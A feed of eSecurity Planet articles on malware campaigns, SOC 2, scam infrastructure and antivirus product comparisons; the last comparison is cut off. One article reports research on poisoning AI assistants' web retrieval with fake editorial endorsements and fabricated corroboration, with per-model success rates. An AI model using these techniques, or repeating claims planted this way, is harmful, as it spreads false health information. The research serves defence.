Researchers found the malware downloading additional payloads through PowerShell, communicating with C2 servers, and using scheduled tasks and WMI to maintain persistence. 

Once inside a network, LemonDuck can move laterally by exploiting reused credentials or vulnerable systems, increasing both operational disruption and recovery costs.

Organizations can reduce their exposure by taking the following steps:

  • Apply patches, especially on internet-facing assets
  • Limit PowerShell access to authorized administrators
  • Enforce phishing-resistant MFA
  • Monitor outbound traffic for suspicious domains
  • Use EDR/XDR solutions to detect behavioral anomalies  

Reducing exposed attack surfaces and improving endpoint visibility can limit LemonDuck’s impact. 

GoldBrute Continues to Target Exposed Remote Desktop Services

Barracuda’s team also identified an active GoldBrute botnet infection during a proactive threat hunt. 

GoldBrute is a Java-based malware family that targets internet-facing remote desktop protocol (RDP) services using brute-force credential attacks.

When attackers successfully compromise an RDP system, the infected host becomes part of the GoldBrute botnet, scanning for additional victims while launching credential attacks against other exposed systems. 

During the observed incident, the malware executed through Java components while maintaining communication with botnet infrastructure.

Recent threat intelligence has associated GoldBrute operators with ransomware-related activity, suggesting these infections may represent an initial access vector for more destructive attacks.

Organizations operating exposed RDP services without MFA, account lockout policies, or strong password requirements face increased risk. 

Defensive measures include removing RDP from direct internet exposure, requiring secure VPN or Zero Trust Network Access (ZTNA) solutions, enforcing phishing-resistant MFA, restricting repeated login attempts, and monitoring authentication logs for abnormal activity.

Password Spraying Against VPNs Remains a Persistent Threat

Barracuda researchers also reported a 55% increase in password spraying activity originating from Iran during May compared to the previous month. 

The campaigns primarily targeted FortiGate VPN infrastructure by attempting a small number of common passwords across many user accounts rather than repeatedly attacking a single account.

Although the observed attacks were unsuccessful, they demonstrate that remote access infrastructure remains a high-value target for adversaries seeking initial network access.

“The sharp increase in password spraying and attacks targeting exposed remote services highlights how threat actors continue to exploit some of the most persistent gaps in enterprise security,” said Laila Mubashar, Senior Cybersecurity Analyst at Barracuda Managed XDR, in an email to eSecurityPlanet.  

Laila explained, “These attacks are low cost, scalable and often highly effective when organizations lack strong access controls.”

She added, “To stay protected, businesses should focus on reducing exposed attack surfaces, enforcing multifactor authentication, strengthening password policies, and investing in continuous monitoring to identify suspicious activity before it escalates into compromise.”

Organizations that rely only on passwords for internet-facing VPNs remain vulnerable to credential attacks, especially when weak passwords and limited login monitoring are involved. 

Organizations should enable MFA, enforce strong password policies, use password managers, monitor for password spraying attempts, and minimize exposure of internet-facing VPN services. 

Building Stronger Identity Defenses

While LemonDuck, GoldBrute, and password spraying campaigns use different techniques, they all exploit the same underlying weaknesses: insufficient identity protection and exposed remote access services.

MFA, least privilege, monitoring, patching, and reduced internet exposure can help prevent opportunistic attacks from escalating into broader compromise. 

Organizations looking to strengthen identity security and remote access should also consider how zero trust solutions can help reduce the attack surface and limit lateral movement. 

The post Weak Access Controls Leave Enterprise Networks at Risk  appeared first on eSecurity Planet.

SOC 2 Compliance Is Reshaping Enterprise Procurement 

eSecurity Planet Jun 26, 2026 · 20:20

Security and compliance have become increasingly important factors in enterprise purchasing decisions. 

While SOC 2 compliance was once viewed as a differentiator, many organizations now expect vendors to demonstrate independently validated security controls before advancing through procurement. 

According to Aaron Puckett, Executive Vice President of Managed Services Group, the next phase of vendor evaluation will place greater emphasis on verifying compliance rather than simply asking whether it exists.

Key Takeaways

  • SOC 2 has evolved from a competitive differentiator to an expected requirement for many enterprise procurement and vendor risk assessments.
  • Enterprise buyers increasingly want audit reports, compliance documentation, and independently validated security controls — not just vendor security claims.
  • Organizations without SOC 2 often face longer sales cycles, additional security questionnaires, and increased procurement scrutiny.
  • Many buyers still treat SOC 2 as a checkbox, but leading organizations are beginning to evaluate audit scope and distinguish between Type I and Type II reports. 

Enterprise Buyers Want Proof, Not Promises

Enterprise buyers have shifted from accepting vendor security claims at face value to requiring evidence that security controls are operating effectively. 

Procurement and security teams increasingly request compliance documentation, audit reports, cyber insurance information, and other supporting materials before approving vendors.

Puckett noted that security professionals generally understand how to evaluate these materials, while many business decision-makers are still developing familiarity with compliance frameworks and their significance.

SOC 2 Is Appearing Earlier in Procurement

Over the past several years, SOC 2 has become a common requirement in requests for proposals (RFPs), vendor questionnaires, and procurement reviews. 

Rather than waiting until contract negotiations, many organizations now use SOC 2 as an early screening criterion during vendor qualification.

However, Puckett observed that many organizations ask whether a vendor has SOC 2 without requesting the report or understanding the differences between a Type I and Type II audit. 

As a result, SOC 2 often functions as a procurement checkbox instead of a meaningful assessment of a vendor’s security program.

The Cost of Not Having SOC 2

Organizations without a SOC 2 audit can still win enterprise business, but the process is often more difficult. 

Vendors may face longer procurement reviews, additional security questionnaires, and greater scrutiny from customer security teams.

According to Puckett, the costs extend beyond just lost opportunities. 

Sales teams frequently spend significant time responding to security questionnaires and supplying documentation that an independent SOC 2 audit could have already validated. 

These delays increase sales cycle length and consume internal resources that could otherwise support business growth.

Common Misconceptions About SOC 2

One common misconception is that SOC 2 is universally understood across executive leadership. 

Puckett noted that many business leaders are unfamiliar with the framework and may not recognize the distinction between Type I and Type II reports.

Another misconception is that obtaining SOC 2 automatically wins enterprise deals. 

While the audit can reduce procurement friction and build buyer confidence, it represents only one component of a broader vendor risk evaluation process.

Organizations pursuing SOC 2 also frequently discover that operational maturity — not technology — is the greatest challenge. 

Maintaining policies, documentation, evidence collection, and consistent internal processes often requires more effort than implementing technical security controls.

Compliance as a Competitive Advantage

Rather than treating SOC 2 as a compliance exercise, organizations can use it to demonstrate operational maturity and strengthen customer trust. 

An independent audit provides buyers with objective evidence that security controls have been evaluated by a third party, reducing uncertainty during procurement.

Puckett emphasized that the strongest organizations use SOC 2 as proof rather than marketing, allowing them to move through vendor risk assessments more efficiently.

Bottom Line

SOC 2 is becoming an increasingly important factor in enterprise vendor selection, but expectations are evolving. 

Today, many organizations simply ask whether vendors have SOC 2. 

According to Puckett, buyers are increasingly likely to request audit reports, review their scope, and distinguish between Type I and Type II assessments.

As cyber risks continue to grow, independently validated security programs will likely carry more weight than vendor marketing claims. 

Organizations that invest in operational maturity and transparent security practices will be better positioned to reduce procurement friction and compete for enterprise business.

The post SOC 2 Compliance Is Reshaping Enterprise Procurement  appeared first on eSecurity Planet.

GEO Poisoning Can Manipulate AI-Generated Answers 

eSecurity Planet Jun 26, 2026 · 18:42

As organizations increasingly rely on AI assistants for research and decision-making, attackers may have a new way to influence AI-generated answers without compromising the underlying models. 

New research from Lasso Security demonstrates that generative engine optimization (GEO) — the practice of optimizing content for inclusion in AI-generated responses — can be manipulated to promote false or harmful information through publicly available web content.

Key Takeaways from the GEO Poisoning Research

  • Researchers demonstrated that attackers can manipulate AI-generated answers using generative engine optimization (GEO) without compromising the underlying AI model.
  • The attack relies on publicly available web content, using techniques such as fake editorial endorsements and corroborating sources to influence AI responses.
  • Among five AI models tested, Llama-4-Maverick and GPT-4o-mini were the most susceptible, while Grok and Claude Haiku showed strong resistance.
  • Fake editorial endorsements proved the most effective technique, causing Llama-4-Maverick to promote false claims in up to 98% of test runs.
  • Organizations can reduce risk by validating retrieved content, verifying source credibility, and implementing strong AI governance and content verification controls.

GEO Expands the AI Attack Surface

GEO is the AI equivalent of traditional search engine optimization (SEO). 

Instead of trying to rank highly in search results, GEO aims to increase the likelihood that AI assistants such as ChatGPT, Gemini, Perplexity, or Claude will cite and summarize specific content within their generated responses. 

As AI assistants increasingly retrieve information from the web to answer user questions, the content they retrieve can significantly influence their responses.

The researchers explored whether legitimate GEO techniques could also be weaponized to increase the visibility of false information. 

Unlike prompt injection attacks or model compromise, the attack requires only publicly accessible web pages optimized using common GEO practices, with no access to the AI model or application itself.

Testing AI Models Against GEO Manipulation

To evaluate the risk, researchers created a legitimate-looking website about gluten-free recipes that contained one intentionally false medical claim — that colloidal silver could heal celiac disease. 

The claim was then enhanced using standard GEO techniques such as structured formatting, fabricated statistics, fake expert endorsements, and corroborating editorial content.

The experiment included 5,525 test runs across five production AI models: GPT-4o-mini, Llama-4-Maverick, DeepSeek-R1, Grok, and Claude Haiku 4.5. 

Researchers measured whether the models cited the malicious content and whether they promoted the false medical claim in their responses.

Results varied considerably. Llama-4-Maverick proved the most susceptible, while GPT-4o-mini also showed significant vulnerability. 

DeepSeek demonstrated partial resistance, whereas Grok and Claude Haiku consistently resisted the manipulation attempts.

Editorial Endorsements Had the Greatest Impact

Among the 24 GEO techniques evaluated, fabricated editorial endorsements proved the most effective.

When researchers surrounded the malicious webpage with multiple fake editorial articles that repeated the same claim, Llama-4-Maverick promoted the false information in 92% of test runs. 

Combining editorial endorsements with a listicle format increased the success rate to 98%. 

GPT-4o-mini also showed elevated susceptibility, promoting the false claim in 84% of runs using the same combination.

The researchers found that AI models frequently treated repeated claims across multiple sources as evidence of credibility, even when the supporting content originated from attacker-controlled websites.

Why the Findings Matter

The study highlights a growing security challenge as organizations and consumers increasingly trust AI-generated responses. 

Unlike traditional cyberattacks, GEO manipulation does not require exploiting vulnerabilities or compromising systems. 

Instead, attackers can influence AI-generated content simply by publishing optimized web pages and creating the appearance of independent corroboration.

The researchers note that the technique aligns with OWASP’s guidance on overreliance risks, where users may trust AI-generated information without verifying its accuracy. 

How Organizations Can Reduce Risk

Lasso Security recommends treating retrieved web content as untrusted input rather than automatically accepting it as authoritative. 

Organizations building AI applications should implement content verification and filtering before retrieved information is incorporated into AI reasoning or automated workflows. 

AI systems should also provide transparent source attribution so users can independently evaluate the credibility of cited information. 

Finally, users should verify important claims — particularly those involving health, financial, or legal advice — against trusted primary sources instead of relying solely on AI-generated responses.

Bottom Line

The research demonstrates that the same optimization techniques organizations use to improve AI visibility can also be exploited to manipulate AI-generated answers. 

Reducing AI content manipulation requires stronger validation of retrieved information and greater transparency into trusted sources.  

As organizations expand their use of AI, strong AI governance is becoming essential to ensure AI systems produce trustworthy, transparent, and reliable outputs. 

The post GEO Poisoning Can Manipulate AI-Generated Answers  appeared first on eSecurity Planet.

Chinese Development Framework Linked to Global Scam Infrastructure

eSecurity Planet Jun 26, 2026 · 17:58

A new Infoblox Threat Intel report reveals that the legitimate DCloud Uni-App framework has become a foundation for a global online scam ecosystem. 

Researchers identified more than 236,000 scam domains built with DCloud Uni-App, including fake crypto exchanges, phishing sites, gambling platforms, and investment scams.  

Key Takeaways

  • Researchers linked more than 236,000 scam domains to the legitimate DCloud Uni-App framework, demonstrating how threat actors are scaling online fraud.
  • The infrastructure supports fake cryptocurrency exchanges, phishing campaigns, gambling platforms, investment scams, and other fraudulent websites.
  • Infoblox observed nearly 1,000 enterprise organizations generating more than five million DNS lookups to DCloud-based scam infrastructure, highlighting enterprise exposure through employee activity.
  • Threat actors are using increasingly sophisticated tactics, including legitimate government registrations and bulletproof hosting services, to make scams appear more credible and resist disruption. 

DCloud Powers a Large-Scale Scam Ecosystem

The researchers found the infrastructure has expanded rapidly since mid-2022, reaching a peak of approximately 15,000 new scam sites each month following publicity surrounding the RainbowEx cryptocurrency fraud. 

Rather than representing a single criminal operation, the researchers found evidence that multiple threat actors use similar DCloud-based templates to launch various fraudulent services. 

These include:

  • Fake cryptocurrency exchanges
  • Cryptocurrency wallet-draining websites
  • Gambling and prediction market scams
  • WhatsApp credential phishing pages
  • Generic investment and pyramid schemes

The framework allows operators to quickly deploy convincing websites while reusing common code, registration workflows, and user interfaces across numerous campaigns.

Investment Scams Continue Expanding

The report traces the same technical template used in Argentina’s widely publicized RainbowEx cryptocurrency scam to operations actively targeting U.S. victims.

Researchers highlighted an ongoing bicycle-sharing investment scam that presents itself as a legitimate business while displaying a real U.S. Financial Crimes Enforcement Network (FinCEN) Money Services Business registration. 

Although the registration is authentic, Infoblox notes that FinCEN explicitly warns consumers that registration alone should not be interpreted as government approval or proof of legitimacy.

The report also connects DCloud infrastructure to the previous Lightning Shared Scooter Co. (LSSC) investment scheme, which reportedly caused millions of dollars in losses across numerous U.S. states after convincing victims to invest in fictional scooter-sharing operations.

Enterprise Networks Are Seeing Significant Exposure

Although these scams primarily target consumers rather than businesses, the research demonstrates measurable enterprise exposure.

Infoblox observed approximately 985 enterprise organizations across 25 industries with devices attempting to access DCloud-based scam infrastructure. 

Collectively, those organizations generated more than five million DNS lookups to identified scam domains.

Rather than indicating direct attacks against corporate networks, researchers believe this activity reflects employees accessing scam websites from corporate devices or while connected to enterprise networks. 

How to Reduce Risk

Infoblox recommends organizations reduce risk by combining DNS-layer protection with broader employee awareness training

DNS-layer security can block known scam domains before users reach them, while expanded awareness training should cover consumer investment scams, fake cryptocurrency platforms, and social engineering tactics. 

Organizations should also educate users that government registrations, including FinCEN listings, do not validate an investment opportunity’s legitimacy and monitor DNS activity for connections to known scam infrastructure. 

The researchers added that more sophisticated operators increasingly rely on bulletproof hosting services that are more resistant to takedown efforts. 

Bottom Line

The Infoblox research demonstrates how legitimate development frameworks can be repurposed at scale by cybercriminals to rapidly launch convincing fraud campaigns. 

As scam campaigns become more sophisticated, zero trust solutions can help organizations continuously verify users and devices before granting access to critical resources. 

The post Chinese Development Framework Linked to Global Scam Infrastructure appeared first on eSecurity Planet.

Comparing Antivirus Software 2026: Avast vs. AVG

eSecurity Planet Jun 26, 2026 · 16:26

This guide is for consumers, freelancers, and small business users comparing Avast and AVG antivirus software in 2026. It evaluates pricing, malware protection, features, customer support, performance, and privacy considerations to help you determine which antivirus solution best fits your needs.

Key Points about Avast vs AVG Antivirus in 2026

  • Avast and AVG provide nearly identical antivirus protection because they are owned by the same parent company and use the same security engine.
  • Both solutions achieve excellent malware detection rates and include core security features such as real-time protection, firewall capabilities, VPN options, and web protection.
  • AVG offers slightly lower introductory pricing, but the two products are otherwise very similar in features, performance, and customer support.
  • Both vendors have faced regulatory scrutiny over past user data collection and monetization practices, making trust and privacy important considerations for potential buyers.
  • Users looking for stronger privacy assurances or business-grade protection may want to consider alternatives such as Microsoft Defender or Malwarebytes.

An antivirus can offer some security for users worried about stumbling upon malware while browsing the Internet. A good antivirus can detect malware on whatever device the antivirus is scanning. In some cases, it can even remove that malware before it’s had a chance to cause much harm to the device or user, though this isn’t as common.

The antivirus industry can feel pretty big, so we’re gonna focus on only two platforms today: Avast and AVG. Both platforms are owned by the same company (Avast Software s.r.o.), but does that mean they’re the same product? Let’s find out.

Pricing and product offerings may change over time; always check the vendor’s official website for the latest pricing, licensing, and feature information before making a purchasing decision.

Avast vs. AVG at a Glance

Let’s compare some basic pricing and features between Avast and AVG in a handy-dandy table before we look at them in more detail below:

Avast logo.AVG logo.Lowest Annual Price*$69.99 per year for the first year; $99.99 per year for subsequent years$59.88 per year for the first year; $99.99 per year for subsequent yearsSupported Operating SystemsWindows, MacOS, and Android***Windows, MacOS, and Android***Maximum Number of Devices Supported1010FirewallYesYesMalware Detection Rates**100%100%

*While Avast and AVG both have free versions, those are not being considered for this review. Instead, I am looking at Avast Premium Security, AVG Internet Security, and any higher-priced subscription tiers.

**Malware detection rates in this table were pulled from AV-Test.org’s August 2024 Windows test. Detection rates from other websites, including AV-Comparatives, were used to evaluate the products.

*** While Avast and AVG both have iOS products, neither are antiviruses, and neither will be considered for this article.

{"slug":"cybersecurity","count":"3","layout_id":37376,"layout":"featured","traction_data":[],"headline":"","show_product_name":"yes","show_product_logos":"yes","show_cta_buttons":"yes","placement":"grid-extended"}

Featured Partners

Visit Website Good For Employees per Company Size Micro (0-49), Small (50-249), Medium (250-999), Large (1,000-4,999), Enterprise (5,000+) Micro, Small, Medium Sized Companies Core Features Lorem ipsum, dolor, sit amet, consectetur, adipiscing, and more Integrations Lorem ipsum, dolor, sit amet, consectetur, adipiscing, and more

eSecurity Planet may receive a commission from merchants for referrals from this website

Avast Overview

Overall Rating: 2.5/5

  • Pricing: 2/5
  • Core Features: 5/5
  • Advanced Features & Integrations: 3/5
  • Customer Support: 2/5
  • Impact on Device Performance: 4/5
  • Trustworthiness: 0/5
Avast icon.

With its free version and decades of experience, Avast has become a household name in the antivirus space. That doesn’t mean it’s necessarily good. It has some things going for it. Its impact on device performance was relatively low, it scores well in independent testing, and its office management plan can be nice for businesses that employ many remote workers.

However, that’s where the positives stop, in my opinion. The service is expensive, and the features it does offer aren’t really all that different from most any other antivirus platform on the market. Additionally, while its test results are good, so are the likes of Microsoft Defender, Avira, and Bitdefender, which are all at equivalent prices or are cheaper.

Then we get to trust, which is my biggest issue with Avast. In 2020, the company harvested users’ browsing data, particularly data collected from Avast and AVG’s free versions and browser extensions, to be monetized through company subsidiary Jumpshot.

After being caught, the company defended this data collection as perfectly legal, promising to scrub collected data of identifying information. It did, however, reinforce its commitment to monetizing this scrubbed data by selling it to companies like Pepsi and Google, as reported by PC Mag’s Michael Kan.

While the company was first caught 4 years ago, this was not the end of the story. In February 2024, the FTC ordered Avast to cease “selling browsing data for advertising purposes” and to pay out $16.5 million for doing so. According to the FTC, this data harvesting has been happening since 2014.

While the FTC has banned Avast from continuing its data harvesting ways, I simply cannot trust a cybersecurity company I know has done this. A lot of what an antivirus gives users is peace of mind and a feeling of safety when using their computer. As such, trust is the most essential currency a company like this has with potential customers. Without that trust, why would you ever use software that requires so much data and access privileges on your device?

The bottom line is I wouldn’t trust Avast with my personal data, and I don’t think anyone else should either.

Pros & Cons

ProsConsOffice management plan might be nice for remote workersHas monetized user data in the pastLow impact on device performanceExpensiveGood independent test resultsRuns on the same engine as AVG

AVG Overview

Overall Rating: 2.5/5

  • Pricing: 2/5
  • Core Features: 5/5
  • Advanced Features & Integrations: 3/5
  • Customer Support: 2/5
  • Impact on Device Performance: 4/5
  • Trustworthiness: 0/5
AVG icon.

Everything I said about Avast can be applied to AVG. The same company owns them, runs on the same engine, and, as briefly demonstrated in the comparison below, even uses the exact wording on their websites when describing certain features. These two have the same overall score because neither does anything that the other isn’t also doing.

This means AVG and Avast share many of the same positives (good independent test results, relatively low device slowdowns when in use) and negatives (too expensive without providing enough to justify the price).

It also means my trust issues with Avast are the same as those with AVG. The company’s data harvesting and monetization practices used antivirus-free versions and browser extensions. If you want my recommendation, I’d say stay far away from both providers.

Pros & Cons

ProsConsNice collection of business-focused add-ons, including patch managementHas monetized user data in the pastGood independent test resultsExpensiveLow impact on device performanceRuns on the same engine as Avast

Best for Pricing: AVG

Avast logo.AVG logo.Lowest Pricing Tier (Billed Annually)$69.99 per year for the first year; $99.99 per year for subsequent years$59.88 per year for the first year; $99.99 per year for subsequent yearsHighest Pricing Tier (Billed Annually)$69.99 per year for the first year; $139.99 per year for subsequent years$59.88 per year for the first year; $139.99 per year for subsequent yearsFree Trial30 days30 days

Winner: AVG’s first-year annual pricing being roughly $10 cheaper gives it a slight edge over Avast, but this is as close to a tie as one can get without it actually being a tie.

Best for Core Features: Avast & AVG

Avast logo.AVG logo.Endpoint ScanningYesYesAntimalwareYesYesWeb Browsing ProtectionYesYesAd BlockingYes, as a free browserYes, as a free browser

Winner: Avast and AVG are owned by the same company and run on the same engine. In terms of core features, these two are identical. This includes the store pages for both products using the same wording for several of the listed features.

Avast features chart. AVG features chart.

Best for Advanced Features & Integrations: Avast & AVG

Avast logo.AVG logo.VPNYesYesPassword ManagerNoNoFirewallYesYesDark Web MonitoringYes, as an add-on*Yes, as an add-on

* Avast dark web monitoring feature is only available as part of the Avast One subscription. It cannot be purchased a la carte.

Winner: Once again, these two are more or less the same antivirus in different skins. 

Best for Customer Support: Avast & AVG

Avast logo.AVG logo.Support Forum/Customer CommunityYesYesSupport Hours24/724/7Phone Support (With a Human Agent)YesYesEmail SupportNoNoLive Chat Support (With a Human Agent)NoNo

Winner: I’m sure it is a silly coincidence that the two antiviruses using the same engine and owned by the same company have the same customer support features.

Who Shouldn’t Use Avast or AVG?

In my opinion, no one should use either service. While this is a knock on their overall quality as products, it’s also just my recommendation to use antiviruses. The bulk of paid antivirus options don’t provide enough value for your money compared to cheaper options like Microsoft Defender, and the shady history of the free version of these antiviruses makes it impossible for me to recommend anyone use that either.

If you’re looking for a way to secure your business better, I would avoid antiviruses in most cases. The intense consumption of machine resources, high prices, and loads of feature bloat make most antivirus platforms not worth the money. Many antivirus providers also offer endpoint detection response (EDR) solutions that will better scale and suit the needs of most mid-size businesses.

2 Alternatives to Avast & AVG

Avast and AVG aren’t the only antivirus solutions on the market. Here are a couple of alternatives for your consideration:

Microsoft Defender

If you’re a PC user, the Microsoft Defender software with a Microsoft 365 subscription will, more often than not, be just as effective as any of the more expensive, more feature-burdened platforms. It scores well in virus detection tests run by reputable sites like AV-test and AV-Comparatives, and it lacks many bloatware and unnecessary features common in modern antivirus software.

Microsoft Defender is available as part of the Microsoft 365 subscription plan, which starts at $69.99 per year. Microsoft 365 also has features like identity theft monitoring, OneDrive file protection, and advanced email and calendar features for Microsoft Outlook, besides the Defender antivirus. Additionally, there’s Microsoft Defender for Business, which has plans starting at $3 per user per month for up to 300 users and up to 5 devices per user.

Malwarebytes

Malwarebytes is one of the only antivirus programs I would consider using. It scores well in virus detection tests while not, in my experience, causing the sort of intense slowdowns commonly associated with antiviruses. However, there is still a noticeable slowdown while in use. Malwarebytes’ plans can start at $3.75 per month for individuals and freelance users.

Malwarebytes’ Teams plan for businesses and organizations starts at $119.97 per year for 3 devices but can go up to 20 if necessary. Interested business clients can also look into the company’s managed detection response and EDR solutions.

How I Compared Avast & AVG

To grade Avast and AVG on a roughly even playing field, I created a grading rubric with 6 categories that interested buyers should consider when deciding which antivirus to buy. Two categories (Trustworthiness and Impact on Device Performance) did not get a dedicated section due to there not being much to compare within the format of this article. Still, they were briefly discussed in the overview for both products.

Pricing – 15%

I looked at the pricing on the lowest-available paid plans for both services. This was its Premium Security antivirus plan for Avast; for AVG, this was AVG Internet Security.

Core Features – 20%

I evaluated the availability of basic antivirus features for both Avast and AVG. Basic features included endpoint scanning and web browsing protection.

Advanced Features & Integrations – 10%

For this category, I analyzed some nice-to-haves for an antivirus, including a firewall and dark web monitoring. Password Managers and VPNs were also considered, though their impact on my overall grade was minor.

Customer Support – 10%

I checked out this category’s customer support options for Avast and AVG. This included determining if I could contact human customer support agents via phone or live chat, whether customer forums were available, and whether either company had 24/7 support.

Impact on Device Performance – 15%

I looked at how much each software slowed down or affected my experience using my device. This includes looking at browsing speeds and if either product’s web protection features are blocked or affected by any websites I commonly use throughout my day, like YouTube or Spotify.

Trustworthiness – 30%

Finally, I researched both companies’ histories for any notable data breaches or past shady activity, like if they had been caught selling user data. In my opinion, trust is the most important consideration factor with cybersecurity products, which is why it’s weighted so much higher than all other categories.

Frequently Asked Questions (FAQs)

What is the difference between Avast and AVG?

Avast and AVG are owned by the same parent company and use the same antivirus engine, making their malware protection, features, and overall performance nearly identical. The primary differences are branding, pricing, and a few subscription options.

Which antivirus is better: Avast or AVG?

Neither product has a meaningful advantage in terms of malware protection or features. AVG has a slight edge on introductory pricing, while Avast offers essentially the same security capabilities under a different brand.

Do Avast and AVG offer free antivirus versions?

Yes. Both vendors provide free antivirus products alongside their premium plans. The paid subscriptions add features such as enhanced web protection, firewall functionality, VPN access, and additional security tools.

Are Avast and AVG trustworthy?

Both products consistently perform well in independent malware detection tests. However, some users may have concerns due to the companies’ past data collection and monetization practices, which resulted in regulatory action and changes to their privacy practices.

Do Avast and AVG include VPNs?

Yes. Both vendors offer VPN functionality through select subscription plans or bundled security suites. The exact VPN features available depend on the subscription tier you choose.

Which antivirus is better for businesses?

Neither Avast Premium Security nor AVG Internet Security is designed as a comprehensive business security platform. Organizations that need centralized management, endpoint detection and response (EDR), or enterprise-grade protection should consider business-focused security solutions instead.

What are good alternatives to Avast and AVG?

Popular alternatives include Microsoft Defender, Malwarebytes, Bitdefender, and Norton. These products offer varying combinations of malware protection, ransomware defense, privacy features, and pricing to meet different user needs.

Bottom-Line: Avast vs. AVG

Avast and AVG are functionally identical antiviruses and are owned by the same company. That company used both antivirus-free versions and browser extensions to harvest user data that a subsidiary monetized. Even if these were the best antivirus products in the world, which they are not, I would never trust this company with my personal data, and I don’t think anyone else should either.

This article was published in October 2024 and last updated in June 2026.

The post Comparing Antivirus Software 2026: Avast vs. AVG appeared first on eSecurity Planet.

Norton vs McAfee: Compare Antivirus Software in 2026

eSecurity Planet Jun 26, 2026 · 16:14

This guide is for consumers, freelancers, and remote workers comparing Norton and McAfee antivirus software in 2026 to protect their devices and personal information. It evaluates pricing, security features, privacy tools, customer support, and overall usability to help you choose the antivirus solution that best fits your needs.

Key points about Norton vs McAfee Antivirus in 2026

  • Norton is the stronger overall choice for most consumers, offering better ease of use, customer support, ransomware protection, and identity monitoring.
  • McAfee stands out with privacy-focused features such as data cleanup, social media privacy management, and support for unlimited devices on select plans.
  • Both antivirus solutions include core protections like malware detection, VPN access, password managers, and dark web monitoring.
  • Norton is ideal for users who value guided support, training resources, and family-friendly features like parental controls.
  • McAfee is a better fit for users looking to monitor and reduce their online privacy exposure while protecting multiple personal devices.

Norton 360 and McAfee Total Protection are device and user security solutions that focus on antivirus but also offer additional features like VPNs. Norton is a strong choice for users that need a lot of support, like multiple contact channels and training videos. McAfee is great if you want extensive privacy and personal data monitoring. I evaluated Norton and McAfee and compared their pricing and key features to help you decide which is a better fit for you.

Pricing and product offerings may change over time; always check the vendor’s official website for the latest pricing, licensing, and feature information before making a purchasing decision.

  • Norton 360: Better solution for ease of use and customer support ($29.99+ for a single device)
  • McAfee Total Protection: Better for privacy and data cleanup features ($29.99+ for a single device)
{"slug":"antivirus-software","count":"3","layout_id":37378,"layout":"top3","traction_data":[],"headline":"Featured Partners: Antivirus Software ","show_product_name":"yes","show_product_logos":"yes","show_cta_buttons":"yes","placement":"grid-extended"}

Featured PartnersFeatured Partners: Antivirus Software

Visit Website Good For Employees per Company Size Micro (0-49), Small (50-249), Medium (250-999), Large (1,000-4,999), Enterprise (5,000+) Micro, Small, Medium Sized Companies Core Features Lorem ipsum, dolor, sit amet, consectetur, adipiscing, and more Integrations Lorem ipsum, dolor, sit amet, consectetur, adipiscing, and more

eSecurity Planet may receive a commission from merchants for referrals from this website

Norton vs McAfee at a Glance

The following table covers Norton’s and McAfee’s similarities and differences, looking specifically at pricing plans, features, and operating system support.

Norton logo.McAfee logo.Annual Price• Norton Antivirus Plus: $29.99 (1 device)
• Norton 360 Standard: $39.99 (1 device)
• Norton 360 Deluxe: $49.99 (5 devices)
• Norton 360 with LifeLock: $99.99 (10 devices)• McAfee Basic: $29.99 (1 device)
• McAfee Essential: $39.99 (5 devices)
• McAfee Premium: $49.99 (unlimited)
• McAfee Advanced: $89.99 (unlimited)
• McAfee Ultimate: $199.99 (unlimited)Supported Operating SystemsWindows, Mac, Android, iOSWindows, Mac, Android, iOSNumber of Devices Supported1-10 (depending on plan)1-unlimited (depending on plan)Ransomware ProtectionYesNoVPN Feature or Add-OnYes YesIdentity Theft MonitoringYesYesVisit NortonVisit McAfee

Through my comparison of the two, I found that Norton is the better overall solution, with plenty of device and identity security features, training videos for customers, and multiple support channels. However, McAfee is still a solid choice, especially if you’re looking for plenty of financial and credit monitoring features. Continue reading to learn more about each product, or skip down to see how I compared Norton and McAfee.

Norton Overview

Better for Ease of Use & Customer Support

Overall Rating: 4.2/5

  • Pricing: 3.7/5
  • Core features: 3.5/5
  • Advanced features: 4.3/5
  • Ease of use and admin: 4.4/5
  • Customer support: 5/5
Norton icon.

Norton Antivirus and Norton 360 are antivirus and security plans for consumers to protect up to 10 devices, including phones and tablets. Aside from antivirus, Norton offers ransomware and hacking protection, privacy monitoring, and a VPN. On the usability side, it supports Mac, Windows, Android, and iOS devices. Norton has multiple training videos and help articles for using the software, and it offers phone, email, and chat options for customer support.

Visit Norton

Pros & Cons

ProsConsExtensive identity and credit monitoring featuresNo anti-spyware or data cleanup featuresTraining videos available for new usersLimited security assessment functionalityEmail, phone, and live chat supportOnly supports up to 10 devices

Key Features

  • Dark web monitoring: Norton scans the dark web for customers’ personal information in case it’s been exposed.
  • Parental controls: A good feature for families, Norton’s controls allow parents to set internet time limits for children and filter the web content they can see.
  • Password manager: Norton generates strong passwords and syncs logins across all your protected devices.
  • Privacy monitoring: Norton searches data broker websites for your personal data so you know where you can request to opt out of having your data exposed.
  • Credit and financial protection: The most expensive plan offers credit monitoring coverage for one credit bureau and limited reimbursement for stolen funds.

If you’re looking to protect your entire home network, learn more about overall network security.

McAfee Overview

Better for Privacy & Data Cleanup Features

Overall Rating: 3.8/5

  • Pricing: 4.7/5
  • Core features: 3.3/5
  • Advanced features: 4.3/5
  • Ease of use and admin: 2.9/5
  • Customer support: 4.4/5
McAfee icon.

McAfee Total Protection is a set of five consumer security plans that include antivirus, web protection, and safety scores. Even McAfee’s most basic plan includes a VPN, identity monitoring, and text scam detection. I recommend McAfee if you’re looking for features like social media privacy, personal data monitoring, and scans of old internet accounts. It helps consumers manage their data privacy and remove information that doesn’t need to be exposed.

Visit McAfee

Pros & Cons

ProsConsEven smaller plans include plenty of featuresNo training videos for new users Credit and identity protection availableRansomware protection seems limitedUnlimited devices in Advanced planNo parental controls in Total Protection

Key Features

  • McAfee Protection Score: Total Protection gives you an overall cybersecurity safety score and recommendations to improve your cyber health.
  • Social Privacy Manager: McAfee helps you quickly adjust your privacy settings on social media based on your frequency of use.
  • Bank transaction monitoring: McAfee sends customers alerts if it finds suspicious activity in their accounts.
  • Credit monitoring: Users receive monthly credit score updates and monitoring through one credit bureau, as well as temporary security freezes as needed.
  • Data cleanup: McAfee searches for your information on data broker sites to help you request removal from the sites.

Better for Pricing: Tie

Norton logo.McAfee logo.Basic PlanNorton Antivirus Plus: $29.99McAfee Basic: $29.99Mid-Range Plans• Norton 360 Standard: $39.99
• Norton 360 Deluxe: $49.99• McAfee Essential: $39.99
• McAfee Premium: $49.99Highest-Priced PlansNorton 360 with LifeLock: $89.99• McAfee Advanced: $89.99
• McAfee Ultimate: $199.99Free Trial7 days30 daysVisit NortonVisit McAfee

Winner: Norton and McAfee have extremely similar pricing for their antivirus plans.

